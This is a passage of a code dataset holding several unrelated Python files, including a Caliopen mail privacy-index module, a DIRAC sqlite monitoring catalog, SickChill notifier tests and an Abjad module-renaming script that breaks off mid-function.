code
stringlengths 1
199k
|
|---|
import mips.registers as mr
SPILL_MEM_LABEL = 'SPILL_MEMORY'
SPILL_MEM_SIZE = 64 # bytes
TEMPROARY_REGISTER_SET = mr.T_REGISTERS
NOT_TESTING_FUNCTIONS = False
|
"""Caliopen mail message privacy features extraction methods."""
from __future__ import absolute_import, print_function, unicode_literals
import logging
import pgpy
from caliopen_main.pi.parameters import PIParameter
from .helpers.spam import SpamScorer
from .helpers.ingress_path import get_ingress_features
from .helpers.importance_level import compute_importance
from .types import init_features
log = logging.getLogger(__name__)
TLS_VERSION_PI = {
'tlsv1/sslv3': 2,
'tls1': 7,
'tlsv1': 7,
'tls12': 10,
}
PGP_MESSAGE_HEADER = '\n-----BEGIN PGP MESSAGE-----'
class InboundMailFeature(object):
"""Process a parsed mail message and extract available privacy features."""
def __init__(self, message, config):
"""Get a ``MailMessage`` instance and extract privacy features."""
self.message = message
self.config = config
self._features = init_features('message')
def is_blacklist_mx(self, mx):
"""MX is blacklisted."""
blacklisted = self.config.get('blacklistes.mx')
if not blacklisted:
return False
if mx in blacklisted:
return True
return False
def is_whitelist_mx(self, mx):
"""MX is whitelisted."""
whitelistes = self.config.get('whitelistes.mx')
if not whitelistes:
return False
if mx in whitelistes:
return True
return False
@property
def internal_domains(self):
"""Get internal hosts from configuration."""
domains = self.config.get('internal_domains')
return domains if domains else []
def emitter_reputation(self, mx):
"""Return features about emitter."""
if self.is_blacklist_mx(mx):
return 'blacklisted'
if self.is_whitelist_mx(mx):
return 'whitelisted'
return 'unknown'
def emitter_certificate(self):
"""Get the certificate from emitter."""
return None
@property
def mail_agent(self):
"""Get the mailer used for this message."""
# XXX normalize better and more ?
return self.message.mail.get('X-Mailer', '').lower()
@property
def transport_signature(self):
"""Get the transport signature if any."""
return self.message.mail.get('DKIM-Signature')
@property
def spam_informations(self):
"""Return a global spam_score and related features."""
spam = SpamScorer(self.message.mail)
return {'spam_score': spam.score,
'spam_method': spam.method,
'is_spam': spam.is_spam}
@property
def is_internal(self):
"""Return true if it's an internal message."""
from_ = self.message.mail.get('From')
for domain in self.internal_domains:
if domain in from_:
return True
return False
def get_signature_informations(self):
"""Get message signature features."""
signed_parts = [x for x in self.message.attachments
if 'pgp-sign' in x.content_type]
if not signed_parts:
return {}
sign = pgpy.PGPSignature()
features = {'message_signed': True,
'message_signature_type': 'PGP'}
try:
sign.parse(signed_parts[0].data)
features.update({'message_signer': sign.signer})
except Exception as exc:
log.error('Unable to parse pgp signature {}'.format(exc))
return features
def get_encryption_informations(self):
"""Get message encryption features."""
is_encrypted = False
if 'encrypted' in self.message.extra_parameters:
is_encrypted = True
# Maybe pgp/inline ?
if not is_encrypted:
try:
body = self.message.body_plain.decode('utf-8')
if body.startswith(PGP_MESSAGE_HEADER):
is_encrypted = True
except UnicodeDecodeError:
log.warn('Invalid body_plain encoding for message')
pass
return {'message_encrypted': is_encrypted,
'message_encryption_method': 'pgp' if is_encrypted else ''}
def _get_features(self):
"""Extract privacy features."""
features = self._features.copy()
received = self.message.headers.get('Received', [])
features.update(get_ingress_features(received, self.internal_domains))
mx = features.get('ingress_server')
reputation = None if not mx else self.emitter_reputation(mx)
features['mail_emitter_mx_reputation'] = reputation
features['mail_emitter_certificate'] = self.emitter_certificate()
features['mail_agent'] = self.mail_agent
features['is_internal'] = self.is_internal
features.update(self.get_signature_informations())
features.update(self.get_encryption_informations())
features.update(self.spam_informations)
if self.transport_signature:
features.update({'transport_signed': True})
return features
def _compute_pi(self, participants, features):
"""Compute Privacy Indexes for a message."""
log.info('PI features {}'.format(features))
pi_cx = {} # Contextual privacy index
pi_co = {} # Comportemental privacy index
pi_t = {} # Technical privacy index
reput = features.get('mail_emitter_mx_reputation')
if reput == 'whitelisted':
pi_cx['reputation_whitelist'] = 20
elif reput == 'unknown':
pi_cx['reputation_unknow'] = 10
known_contacts = []
known_public_key = 0
for part, contact in participants:
if contact:
known_contacts.append(contact)
if contact.public_key:
known_public_key += 1
if len(participants) == len(known_contacts):
# - Si tous les contacts sont déjà connus le PIᶜˣ
# augmente de la valeur du PIᶜᵒ le plus bas des PIᶜᵒ des contacts.
contact_pi_cos = [x.pi['comportment'] for x in known_contacts
if x.pi and 'comportment' in x.pi]
if contact_pi_cos:
pi_cx['known_contacts'] = min(contact_pi_cos)
if known_public_key == len(known_contacts):
pi_co['contact_pubkey'] = 20
ext_hops = features.get('nb_external_hops', 0)
if ext_hops <= 1:
tls = features.get('ingress_socket_version')
if tls:
if tls not in TLS_VERSION_PI:
log.warn('Unknown TLS version {}'.format(tls))
else:
pi_t += TLS_VERSION_PI[tls]
if features.get('mail_emitter_certificate'):
pi_t['emitter_certificate'] = 10
if features.get('transport_signed'):
pi_t['transport_signed'] = 10
if features.get('message_encrypted'):
pi_t['encrypted'] = 30
log.info('PI compute t:{} cx:{} co:{}'.format(pi_t, pi_cx, pi_co))
return PIParameter({'technic': sum(pi_t.values()),
'context': sum(pi_cx.values()),
'comportment': sum(pi_co.values()),
'version': 0})
def process(self, user, message, participants):
"""
Process the message for privacy features and PI compute.
:param user: user the message belong to
:ptype user: caliopen_main.user.core.User
:param message: a message parameter that will be updated with PI
:ptype message: NewMessage
:param participants: an array of participant with related Contact
:ptype participants: list(Participant, Contact)
"""
features = self._get_features()
message.pi = self._compute_pi(participants, features)
il = compute_importance(user, message, features, participants)
message.privacy_features = features
message.importance_level = il
|
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('posgradmin', '0039_auto_20191120_2249'),
]
operations = [
migrations.AlterModelOptions(
name='profesor',
options={'ordering': ['user__first_name', 'user__last_name'], 'verbose_name_plural': 'Profesores'},
),
]
|
""" Interacts with sqlite3 db
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
import sqlite3
import os
import hashlib
import random
import time
import DIRAC
from DIRAC import gLogger, S_OK, S_ERROR
from DIRAC.FrameworkSystem.private.monitoring.Activity import Activity
from DIRAC.Core.Utilities import Time
class MonitoringCatalog(object):
"""
This class is used to perform all kinds queries to the sqlite3 database.
"""
def __init__(self, dataPath):
"""
Initialize monitoring catalog
"""
self.dbConn = False
self.dataPath = dataPath
self.log = gLogger.getSubLogger("ActivityCatalog")
self.createSchema()
def __connect(self):
"""
Connects to database
"""
if not self.dbConn:
dbPath = "%s/monitoring.db" % self.dataPath
self.dbConn = sqlite3.connect(dbPath, timeout=20, isolation_level=None)
# These two settings dramatically increase the performance
# at the cost of a small corruption risk in case of OS crash
# It is acceptable though, given the nature of the data
# details here https://www.sqlite.org/pragma.html
c = self.dbConn.cursor()
c.execute("PRAGMA synchronous = OFF")
c.execute("PRAGMA journal_mode = TRUNCATE")
def __dbExecute(self, query, values=False):
"""
Executes a sql statement.
:type query: string
:param query: The query to be executed.
:type values: bool
:param values: To execute query with values or not.
:return: the cursor.
"""
cursor = self.dbConn.cursor() # pylint: disable=no-member
self.log.debug("Executing %s" % query)
executed = False
retry = 0
while not executed and retry < 10:
retry += 1
try:
if values:
cursor.execute(query, values)
else:
cursor.execute(query)
executed = True
except Exception as e:
self.log.exception("Exception executing statement", "query: %s, values: %s" % (query, values))
time.sleep(random.random())
if not executed:
self.log.error("Could not execute query, big mess ahead", "query: %s, values: %s" % (query, values))
return cursor
def __createTables(self):
"""
Creates tables if not already created
"""
self.log.info("Creating tables in db")
try:
filePath = "%s/monitoringSchema.sql" % os.path.dirname(__file__)
fd = open(filePath)
buff = fd.read()
fd.close()
except IOError as e:
DIRAC.abort(1, "Can't read monitoring schema", filePath)
while buff.find(";") > -1:
limit = buff.find(";") + 1
sqlQuery = buff[:limit].replace("\n", "")
buff = buff[limit:]
try:
self.__dbExecute(sqlQuery)
except Exception as e:
DIRAC.abort(1, "Can't create tables", str(e))
def createSchema(self):
"""
Creates all the sql schema if it does not exist
"""
self.__connect()
try:
sqlQuery = "SELECT name FROM sqlite_master WHERE type='table';"
c = self.__dbExecute(sqlQuery)
tablesList = c.fetchall()
if len(tablesList) < 2:
self.__createTables()
except Exception as e:
self.log.fatal("Failed to startup db engine", str(e))
return False
return True
def __delete(self, table, dataDict):
"""
Executes an sql delete.
:type table: string
:param table: name of the table.
:type dataDict: dictionary
:param dataDict: the data dictionary.
"""
query = "DELETE FROM %s" % table
valuesList = []
keysList = []
for key in dataDict:
if isinstance(dataDict[key], list):
orList = []
for keyValue in dataDict[key]:
valuesList.append(keyValue)
orList.append("%s = ?" % key)
keysList.append("( %s )" % " OR ".join(orList))
else:
valuesList.append(dataDict[key])
keysList.append("%s = ?" % key)
if keysList:
query += " WHERE %s" % (" AND ".join(keysList))
self.__dbExecute("%s;" % query, values=valuesList)
def __select(self, fields, table, dataDict, extraCond="", queryEnd=""):
"""
Executes a sql select.
:type fields: string
:param fields: The fields required in a string.
:type table: string
:param table: name of the table.
:type dataDict: dictionary
:param dataDict: the data dictionary.
:return: a list of values.
"""
valuesList = []
keysList = []
for key in dataDict:
if isinstance(dataDict[key], list):
orList = []
for keyValue in dataDict[key]:
valuesList.append(keyValue)
orList.append("%s = ?" % key)
keysList.append("( %s )" % " OR ".join(orList))
else:
valuesList.append(dataDict[key])
keysList.append("%s = ?" % key)
if isinstance(fields, six.string_types):
fields = [fields]
if len(keysList) > 0:
whereCond = "WHERE %s" % (" AND ".join(keysList))
else:
whereCond = ""
if extraCond:
if whereCond:
whereCond += " AND %s" % extraCond
else:
whereCond = "WHERE %s" % extraCond
query = "SELECT %s FROM %s %s %s;" % (",".join(fields), table, whereCond, queryEnd)
c = self.__dbExecute(query, values=valuesList)
return c.fetchall()
def __insert(self, table, specialDict, dataDict):
"""
Executes an sql insert.
:type table: string
:param table: name of the table.
:type specialDict: dictionary
:param specialDict: the special dictionary.
:type dataDict: dictionary
:param dataDict: the data dictionary.
:return: the number of rows inserted.
"""
valuesList = []
valuePoitersList = []
namesList = []
for key in specialDict:
namesList.append(key)
valuePoitersList.append(specialDict[key])
for key in dataDict:
namesList.append(key)
valuePoitersList.append("?")
valuesList.append(dataDict[key])
query = "INSERT INTO %s (%s) VALUES (%s);" % (table, ", ".join(namesList), ",".join(valuePoitersList))
c = self.__dbExecute(query, values=valuesList)
return c.rowcount
def __update(self, newValues, table, dataDict, extraCond=""):
"""
Executes a sql update.
:type table: string
:param table: name of the table.
:type newValues: dictionary
:param newValues: a dictionary with new values.
:type dataDict: dictionary
:param dataDict: the data dictionary.
:return: the number of rows updated.
"""
valuesList = []
keysList = []
updateFields = []
for key in newValues:
updateFields.append("%s = ?" % key)
valuesList.append(newValues[key])
for key in dataDict:
if isinstance(dataDict[key], list):
orList = []
for keyValue in dataDict[key]:
valuesList.append(keyValue)
orList.append("%s = ?" % key)
keysList.append("( %s )" % " OR ".join(orList))
else:
valuesList.append(dataDict[key])
keysList.append("%s = ?" % key)
if len(keysList) > 0:
whereCond = "WHERE %s" % (" AND ".join(keysList))
else:
whereCond = ""
if extraCond:
if whereCond:
whereCond += " AND %s" % extraCond
else:
whereCond = "WHERE %s" % extraCond
query = "UPDATE %s SET %s %s;" % (table, ",".join(updateFields), whereCond)
c = self.__dbExecute(query, values=valuesList)
return c.rowcount
def registerSource(self, sourceDict):
"""
Registers an activity source.
:type sourceDict: dictionary
:param sourceDict: the source dictionary.
:return: a list of values.
"""
retList = self.__select("id", "sources", sourceDict)
if len(retList) > 0:
return retList[0][0]
else:
self.log.info("Registering source", str(sourceDict))
if self.__insert("sources", {"id": "NULL"}, sourceDict) == 0:
return -1
return self.__select("id", "sources", sourceDict)[0][0]
def registerActivity(self, sourceId, acName, acDict):
"""
Register an activity.
:type sourceId: string
:param sourceId: The source id.
:type acName: string
:param acName: name of the activity.
:type acDict: dictionary
:param acDict: The activity dictionary containing information about 'category', 'description', 'bucketLength',
'type', 'unit'.
:return: a list of values.
"""
m = hashlib.md5()
acDict["name"] = acName
acDict["sourceId"] = sourceId
m.update(str(acDict).encode())
retList = self.__select("filename", "activities", acDict)
if len(retList) > 0:
return retList[0][0]
else:
acDict["lastUpdate"] = int(Time.toEpoch() - 86000)
filePath = m.hexdigest()
filePath = "%s/%s.rrd" % (filePath[:2], filePath)
self.log.info("Registering activity", str(acDict))
# This is basically called by the ServiceInterface inside registerActivities method and then all the activity
# information is stored in the sqlite3 db using the __insert method.
if (
self.__insert(
"activities",
{
"id": "NULL",
"filename": "'%s'" % filePath,
},
acDict,
)
== 0
):
return -1
return self.__select("filename", "activities", acDict)[0][0]
def getFilename(self, sourceId, acName):
"""
Gets rrd filename for an activity.
:type sourceId: string
:param sourceId: The source id.
:type acName: string
:param acName: name of the activity.
:return: The filename in a string.
"""
queryDict = {"sourceId": sourceId, "name": acName}
retList = self.__select("filename", "activities", queryDict)
if len(retList) == 0:
return ""
else:
return retList[0][0]
def findActivity(self, sourceId, acName):
"""
Finds activity.
:type sourceId: string
:param sourceId: The source id.
:type acName: string
:param acName: name of the activity.
:return: A list containing all the activity information.
"""
queryDict = {"sourceId": sourceId, "name": acName}
retList = self.__select(
"id, name, category, unit, type, description, filename, bucketLength, lastUpdate", "activities", queryDict
)
if len(retList) == 0:
return False
else:
return retList[0]
def activitiesQuery(self, selDict, sortList, start, limit):
"""
Gets all the sources and activities details in a joined format.
:type selDict: dictionary
:param selDict: The fields inside the select query.
:type sortList: list
:param sortList: A list in sorted order of the data.
:type start: int
:param start: The point or tuple from where to start.
:type limit: int
:param limit: The number of tuples to select from the starting point.
:return: S_OK with a tuple of the result list and fields list.
"""
fields = [
"sources.id",
"sources.site",
"sources.componentType",
"sources.componentLocation",
"sources.componentName",
"activities.id",
"activities.name",
"activities.category",
"activities.unit",
"activities.type",
"activities.description",
"activities.bucketLength",
"activities.filename",
"activities.lastUpdate",
]
extraSQL = ""
if sortList:
for sorting in sortList:
if sorting[0] not in fields:
return S_ERROR("Sorting field %s is invalid" % sorting[0])
extraSQL = "ORDER BY %s" % ",".join(["%s %s" % sorting for sorting in sortList])
if limit:
if start:
extraSQL += " LIMIT %s OFFSET %s" % (limit, start)
else:
extraSQL += " LIMIT %s" % limit
# This method basically takes in some condition and then based on those performs SQL Join on the
# sources and activities table of the sqlite3 db and returns the corresponding result.
retList = self.__select(
", ".join(fields), "sources, activities", selDict, "sources.id = activities.sourceId", extraSQL
)
return S_OK((retList, fields))
def setLastUpdate(self, sourceId, acName, lastUpdateTime):
"""
Updates the lastUpdate timestamp for a particular activity using the source id.
:type sourceId: string
:param sourceId: The source id.
:type acName: string
:param acName: name of the activity.
:type lastUpdateTime: string
:param lastUpdateTime: The last update time in the proper format.
:return: the number of rows updated.
"""
queryDict = {"sourceId": sourceId, "name": acName}
return self.__update({"lastUpdate": lastUpdateTime}, "activities", queryDict)
def getLastUpdate(self, sourceId, acName):
"""
Gets the lastUpdate timestamp for a particular activity using the source id.
:type sourceId: string
:param sourceId: The source id.
:type acName: string
:param acName: name of the activity.
:return: The last update time in string.
"""
queryDict = {"sourceId": sourceId, "name": acName}
retList = self.__update("lastUpdate", "activities", queryDict)
if len(retList) == 0:
return False
else:
return retList[0]
def queryField(self, field, definedFields):
"""
Query the values of a field given a set of defined ones.
:type field: string
:param field: The field required in a string.
:type field: list
:param definedFields: A set of defined fields.
:return: A list of values.
"""
retList = self.__select(field, "sources, activities", definedFields, "sources.id = activities.sourceId")
return retList
def getMatchingActivities(self, condDict):
"""
Gets all activities matching the defined conditions.
:type condDict: dictionary.
:param condDict: A dictionary containing the conditions.
:return: a list of matching activities.
"""
retList = self.queryField(Activity.dbFields, condDict)
acList = []
for acData in retList:
acList.append(Activity(acData))
return acList
def registerView(self, viewName, viewData, varFields):
"""
Registers a new view.
:type viewName: string
:param viewName: Name of the view.
:type viewDescription: dictionary
:param viewDescription: A dictionary containing the view description.
:type varFields: list
:param varFields: A list of variable fields.
:return: S_OK / S_ERROR with the corresponding error message.
"""
retList = self.__select("id", "views", {"name": viewName})
if len(retList) > 0:
return S_ERROR("Name for view name already exists")
retList = self.__select("name", "views", {"definition": viewData})
if len(retList) > 0:
return S_ERROR("View specification already defined with name '%s'" % retList[0][0])
self.__insert(
"views", {"id": "NULL"}, {"name": viewName, "definition": viewData, "variableFields": ", ".join(varFields)}
)
return S_OK()
def getViews(self, onlyStatic):
"""
Gets views.
:type onlyStatic: bool
:param onlyStatic: Whether the views required are static or not.
:return: A list of values.
"""
queryCond = {}
if onlyStatic:
queryCond["variableFields"] = ""
return self.__select("id, name, variableFields", "views", queryCond)
def getViewById(self, viewId):
"""
Gets a view for a given id.
:type viewId: string
:param viewId: The view id.
:return: A list of values.
"""
if isinstance(viewId, six.string_types):
return self.__select("definition, variableFields", "views", {"name": viewId})
else:
return self.__select("definition, variableFields", "views", {"id": viewId})
def deleteView(self, viewId):
"""
Deletes a view for a given id.
:type viewId: string
:param viewId: The view id.
"""
self.__delete("views", {"id": viewId})
def getSources(self, dbCond, fields=[]):
"""
Gets souces for a given db condition.
:type dbCond: dictionary
:param dbCond: The required database conditions.
:type fields: list
:param fields: A list of required fields.
:return: The list of results after the query is performed.
"""
if not fields:
fields = "id, site, componentType, componentLocation, componentName"
else:
fields = ", ".join(fields)
return self.__select(fields, "sources", dbCond)
def getActivities(self, dbCond):
"""
Gets activities given a db condition.
:type dbCond: dictionary
:param dbCond: The required database conditions.
:return: a list of activities.
"""
return self.__select("id, name, category, unit, type, description, bucketLength", "activities", dbCond)
def deleteActivity(self, sourceId, activityId):
"""
Deletes an activity.
:type sourceId: string
:param sourceId: The source id.
:type activityId: string
:param activityId: The activity id.
:return: S_OK with rrd filename / S_ERROR with a message.
"""
acCond = {"sourceId": sourceId, "id": activityId}
acList = self.__select("filename", "activities", acCond)
if len(acList) == 0:
return S_ERROR("Activity does not exist")
rrdFile = acList[0][0]
self.__delete("activities", acCond)
acList = self.__select("id", "activities", {"sourceId": sourceId})
if len(acList) == 0:
self.__delete("sources", {"id": sourceId})
return S_OK(rrdFile)
|
import os
import subprocess
from os.path import dirname, abspath, join, curdir
from nose.tools import assert_equals, with_setup
from tests.asserts import prepare_stdout
def test_imports_terrain_under_path_that_is_run():
old_path = abspath(curdir)
os.chdir(join(abspath(dirname(__file__)), 'simple_features', '1st_feature_dir'))
status, output = subprocess.getstatusoutput('python -c "from lettuce import world;assert hasattr(world, \'works_fine\'); print \'it passed!\'"')
assert_equals(status, 0)
assert_equals(output, "it passed!")
os.chdir(old_path)
@with_setup(prepare_stdout)
def test_after_each_all_is_executed_before_each_all():
"terrain.before.each_all and terrain.after.each_all decorators"
from lettuce import step
from lettuce import Runner
from lettuce.terrain import before, after, world
world.all_steps = []
@before.all
def set_state_to_before():
world.all_steps.append('before')
@step('append 1 in world all steps')
def append_1_in_world_all_steps(step):
world.all_steps.append("1")
@step('append 2 more')
def append_2_more(step):
world.all_steps.append("2")
@step('append 3 in world all steps')
def append_during_to_all_steps(step):
world.all_steps.append("3")
@after.all
def set_state_to_after(total):
world.all_steps.append('after')
runner = Runner(join(abspath(dirname(__file__)), 'simple_features', '2nd_feature_dir'))
runner.run()
assert_equals(
world.all_steps,
['before', '1', '2', '3', 'after']
)
|
"""
Test notifiers
"""
import unittest
from sickchill.oldbeard import db
from sickchill.oldbeard.notifiers.emailnotify import Notifier as EmailNotifier
from sickchill.oldbeard.notifiers.prowl import Notifier as ProwlNotifier
from sickchill.tv import TVEpisode, TVShow
from sickchill.views.home import Home
from tests import test_lib as test
class NotifierTests(test.SickChillTestDBCase):
"""
Test notifiers
"""
@classmethod
def setUpClass(cls):
num_legacy_shows = 3
num_shows = 3
num_episodes_per_show = 5
cls.mydb = db.DBConnection()
cls.legacy_shows = []
cls.shows = []
# Per-show-notifications were originally added for email notifications only. To add
# this feature to other notifiers, it was necessary to alter the way text is stored in
# one of the DB columns. Therefore, to test properly, we must create some shows that
# store emails in the old method (legacy method) and then other shows that will use
# the new method.
for show_counter in range(100, 100 + num_legacy_shows):
show = TVShow(1, show_counter)
show.name = "Show " + str(show_counter)
show.episodes = []
for episode_counter in range(0, num_episodes_per_show):
episode = TVEpisode(show, test.SEASON, episode_counter)
episode.name = "Episode " + str(episode_counter + 1)
episode.quality = "SDTV"
show.episodes.append(episode)
show.saveToDB()
cls.legacy_shows.append(show)
for show_counter in range(200, 200 + num_shows):
show = TVShow(1, show_counter)
show.name = "Show " + str(show_counter)
show.episodes = []
for episode_counter in range(0, num_episodes_per_show):
episode = TVEpisode(show, test.SEASON, episode_counter)
episode.name = "Episode " + str(episode_counter + 1)
episode.quality = "SDTV"
show.episodes.append(episode)
show.saveToDB()
cls.shows.append(show)
def setUp(self):
"""
Set up tests
"""
self._debug_spew("\n\r")
@unittest.skip('Not yet implemented')
def test_boxcar(self):
"""
Test boxcar notifications
"""
pass
@unittest.skip('Cannot call directly without a request')
def test_email(self):
"""
Test email notifications
"""
email_notifier = EmailNotifier()
# Per-show-email notifications were added early on and utilized a different format than the other notifiers.
# Therefore, to test properly (and ensure backwards compatibility), this routine will test shows that use
# both the old and the new storage methodology
legacy_test_emails = "email-1@address.com,email2@address.org,email_3@address.tv"
test_emails = "email-4@address.com,email5@address.org,email_6@address.tv"
for show in self.legacy_shows:
showid = self._get_showid_by_showname(show.show_name)
self.mydb.action("UPDATE tv_shows SET notify_list = ? WHERE show_id = ?", [legacy_test_emails, showid])
for show in self.shows:
showid = self._get_showid_by_showname(show.show_name)
Home.saveShowNotifyList(show=showid, emails=test_emails)
# Now, iterate through all shows using the email list generation routines that are used in the notifier proper
shows = self.legacy_shows + self.shows
for show in shows:
for episode in show.episodes:
ep_name = episode._format_pattern('%SN - %Sx%0E - %EN - ') + episode.quality
show_name = email_notifier._parseEp(ep_name)
recipients = email_notifier._generate_recipients(show_name)
self._debug_spew("- Email Notifications for " + show.name + " (episode: " + episode.name + ") will be sent to:")
for email in recipients:
self._debug_spew("-- " + email.strip())
self._debug_spew("\n\r")
return True
@unittest.skip('Not yet implemented')
def test_emby(self):
"""
Test emby notifications
"""
pass
@unittest.skip('Not yet implemented')
def test_freemobile(self):
"""
Test freemobile notifications
"""
pass
@unittest.skip('Not yet implemented')
def test_growl(self):
"""
Test growl notifications
"""
pass
@unittest.skip('Not yet implemented')
def test_kodi(self):
"""
Test kodi notifications
"""
pass
@unittest.skip('Not yet implemented')
def test_libnotify(self):
"""
Test libnotify notifications
"""
pass
@unittest.skip('Not yet implemented')
def test_nma(self):
"""
Test nma notifications
"""
pass
@unittest.skip('Not yet implemented')
def test_nmj(self):
"""
Test nmj notifications
"""
pass
@unittest.skip('Not yet implemented')
def test_nmjv2(self):
"""
Test nmjv2 notifications
"""
pass
@unittest.skip('Not yet implemented')
def test_plex(self):
"""
Test plex notifications
"""
pass
@unittest.skip('Cannot call directly without a request')
def test_prowl(self):
"""
Test prowl notifications
"""
prowl_notifier = ProwlNotifier()
# Prowl per-show-notifications only utilize the new methodology for storage; therefore, the list of legacy_shows
# will not be altered (to preserve backwards compatibility testing)
test_prowl_apis = "11111111111111111111,22222222222222222222"
for show in self.shows:
showid = self._get_showid_by_showname(show.show_name)
Home.saveShowNotifyList(show=showid, prowlAPIs=test_prowl_apis)
# Now, iterate through all shows using the Prowl API generation routines that are used in the notifier proper
for show in self.shows:
for episode in show.episodes:
ep_name = episode._format_pattern('%SN - %Sx%0E - %EN - ') + episode.quality
show_name = prowl_notifier._parse_episode(ep_name)
recipients = prowl_notifier._generate_recipients(show_name)
self._debug_spew("- Prowl Notifications for " + show.name + " (episode: " + episode.name + ") will be sent to:")
for api in recipients:
self._debug_spew("-- " + api.strip())
self._debug_spew("\n\r")
return True
@unittest.skip('Not yet implemented')
def test_pushalot(self):
"""
Test pushalot notifications
"""
pass
@unittest.skip('Not yet implemented')
def test_pushbullet(self):
"""
Test pushbullet notifications
"""
pass
@unittest.skip('Not yet implemented')
def test_pushover(self):
"""
Test pushover notifications
"""
pass
@unittest.skip('Not yet implemented')
def test_pytivo(self):
"""
Test pytivo notifications
"""
pass
@unittest.skip('Not yet implemented')
def test_synoindex(self):
"""
Test synoindex notifications
"""
pass
@unittest.skip('Not yet implemented')
def test_synologynotifier(self):
"""
Test synologynotifier notifications
"""
pass
@unittest.skip('Not yet implemented')
def test_trakt(self):
"""
Test trakt notifications
"""
pass
@unittest.skip('Not yet implemented')
def test_tweet(self):
"""
Test tweet notifications
"""
pass
@unittest.skip('Not yet implemented')
def test_twilio(self):
"""
Test twilio notifications
"""
pass
@staticmethod
def _debug_spew(text):
"""
Spew text notifications
:param text: to spew
:return:
"""
if __name__ == '__main__' and text is not None:
print(text)
def _get_showid_by_showname(self, showname):
"""
Get show ID by show name
:param showname:
:return:
"""
if showname is not None:
rows = self.mydb.select("SELECT show_id FROM tv_shows WHERE show_name = ?", [showname])
if len(rows) == 1:
return rows[0]['show_id']
return -1
if __name__ == '__main__':
print("==================")
print("STARTING - NOTIFIER TESTS")
print("==================")
print("######################################################################")
SUITE = unittest.TestLoader().loadTestsFromTestCase(NotifierTests)
unittest.TextTestRunner(verbosity=2).run(SUITE)
|
import os, random
rfilename=random.choice(os.listdir("/storage/pictures"))
rextension=os.path.splitext(rfilename)[1]
picturespath='/storage/pictures/'
for filename in os.listdir(picturespath):
if filename.startswith("random"):
extension=os.path.splitext(filename)[1]
newname=picturespath + str(random.random()).rsplit('.',1)[1] + extension
# rename the existing random wallpaper to something random
filename=picturespath+filename
os.rename(filename, newname)
rfilename=picturespath+rfilename
os.rename(rfilename, picturespath+'random'+rextension)
|
import os
from abjad.tools import documentationtools
from abjad.tools import systemtools
from abjad.tools.developerscripttools.DeveloperScript import DeveloperScript
from abjad.tools.developerscripttools.ReplaceInFilesScript \
import ReplaceInFilesScript
class RenameModulesScript(DeveloperScript):
r'''Renames classes and functions.
Handle renaming the module and package, as well as any tests,
documentation or mentions of the class throughout the Abjad codebase:
.. shell::
ajv rename --help
'''
### PUBLIC PROPERTIES ###
@property
def alias(self):
r'''Alias of script.
Returns ``'rename'``.
'''
return 'rename'
@property
def long_description(self):
r'''Long description of script.
Returns string or none.
'''
return None
@property
def scripting_group(self):
r'''Scripting group of script.
Returns none.
'''
return None
@property
def short_description(self):
r'''Short description of script.
Returns string.
'''
return 'Rename public modules.'
@property
def version(self):
r'''Version of script.
Returns float.
'''
return 1.0
### PRIVATE METHODS ###
def _codebase_name_to_codebase_docs_path(self, codebase):
from abjad import abjad_configuration
if codebase == 'mainline':
return os.path.join(
abjad_configuration.abjad_directory,
'docs',
'source',
'api',
'tools',
)
elif codebase == 'experimental':
return os.path.join(
abjad_configuration.abjad_experimental_directory,
'docs',
'source',
'tools',
)
message = 'bad codebase name: {!r}.'
message = message.format(codebase)
raise Exception(message)
def _codebase_name_to_codebase_tools_path(self, codebase):
from abjad import abjad_configuration
if codebase == 'mainline':
return os.path.join(
abjad_configuration.abjad_directory, 'tools')
elif codebase == 'experimental':
return os.path.join(
abjad_configuration.abjad_experimental_directory, 'tools')
message = 'bad codebase name: {!r}.'
message = message.format(codebase)
raise Exception(message)
def _confirm_name_changes(self,
old_codebase,
old_tools_package_name,
old_module_name,
new_codebase,
new_tools_package_name,
new_module_name,
):
max_codebase = max(len(old_codebase), len(new_codebase))
old_codebase = old_codebase.ljust(max_codebase)
new_codebase = new_codebase.ljust(max_codebase)
print('')
print('Is ...')
print('')
print(' [{}] {}.{}()'.format(
old_codebase, old_tools_package_name, old_module_name))
print(' ===>')
print(' [{}] {}.{}()'.format(
new_codebase, new_tools_package_name, new_module_name))
print('')
string = raw_input('... correct [yes, no, abort]? ').lower()
print('')
if string in ('y', 'yes'):
return True
elif string in ('a', 'abort', 'q', 'quit'):
raise SystemExit
elif string in ('n', 'no'):
return False
def _get_object_names(self, kind, codebase, tools_package_name):
assert kind in ('class', 'function')
tools_path = self._codebase_name_to_codebase_tools_path(codebase)
path = os.path.join(tools_path, tools_package_name)
if kind == 'class':
generator = documentationtools.yield_all_classes(
code_root=path,
include_private_objects=True,
)
elif kind == 'function':
generator = documentationtools.yield_all_functions(
code_root=path,
include_private_objects=True,
)
return tuple(sorted(generator, key=lambda x: x.__name__))
def _get_tools_package_names(self, codebase):
tools_path = self._codebase_name_to_codebase_tools_path(codebase)
names = []
for x in os.listdir(tools_path):
if os.path.isdir(os.path.join(tools_path, x)):
if not x.startswith(('_', '.')):
names.append(x)
return tuple(sorted(names))
def _parse_tools_package_path(self, path):
from abjad import abjad_configuration
if '.' not in path:
raise SystemExit
tools_package_name, module_name = path.split('.')
mainline_tools_directory = os.path.join(
abjad_configuration.abjad_directory,
'tools',
)
for directory_name in os.listdir(mainline_tools_directory):
directory = os.path.join(
mainline_tools_directory, directory_name)
if not os.path.isdir(directory):
continue
elif directory_name != tools_package_name:
continue
return 'mainline', tools_package_name, module_name
experimental_tools_directory = os.path.join(
abjad_configuration.abjad_experimental_directory,
'tools',
)
for directory_name in os.listdir(mainline_tools_directory):
directory = os.path.join(
experimental_tools_directory, directory_name)
if not os.path.isdir(directory):
continue
elif directory_name != tools_package_name:
continue
return 'experimental', tools_package_name, module_name
raise SystemExit
def _rename_old_api_page(self,
old_codebase,
old_tools_package_name,
old_module_name,
new_codebase,
new_tools_package_name,
new_module_name,
):
print('Renaming old API page ...')
old_docs_path = self._codebase_name_to_codebase_docs_path(old_codebase)
new_docs_path = self._codebase_name_to_codebase_docs_path(new_codebase)
old_rst_file_name = old_module_name + '.rst'
new_rst_file_name = new_module_name + '.rst'
old_api_path = os.path.join(
old_docs_path, old_tools_package_name, old_rst_file_name)
new_api_path = os.path.join(
new_docs_path, new_tools_package_name, new_rst_file_name)
command = 'mv {} {}'.format(
old_api_path, new_api_path)
systemtools.IOManager.spawn_subprocess(command)
print('')
def _rename_old_module(self,
old_codebase,
old_tools_package_name,
old_module_name,
new_codebase,
new_tools_package_name,
new_module_name,
):
print('Renaming old module ...')
